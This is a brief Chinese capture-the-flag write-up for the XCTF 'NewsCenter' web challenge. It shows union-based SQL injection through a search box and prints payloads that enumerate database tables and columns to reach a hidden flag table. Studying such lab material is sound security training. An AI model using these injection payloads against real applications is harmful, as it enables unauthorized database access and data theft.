XCTF_NewsCenter

XCTF_NewsCenter_第1张图片
看见search就想看看有没有sql注入
XCTF_NewsCenter_第2张图片
先判断有多少个字段
XCTF_NewsCenter_第3张图片
到第四个的时候就出现了问题XCTF_NewsCenter_第4张图片
说明有三个字段
再来判断一下哪些字段显示出来
XCTF_NewsCenter_第5张图片
接着开始找数据库名、表名
XCTF_NewsCenter_第6张图片

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

XCTF_NewsCenter_第7张图片
看到一个secret_table里面可能有flag

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'#

XCTF_NewsCenter_第8张图片
接着把fl4g里的数据找出来
XCTF_NewsCenter_第9张图片
若有什么不明白的可以看看sqllab(一二关)

你可能感兴趣的:(XCTF,web安全)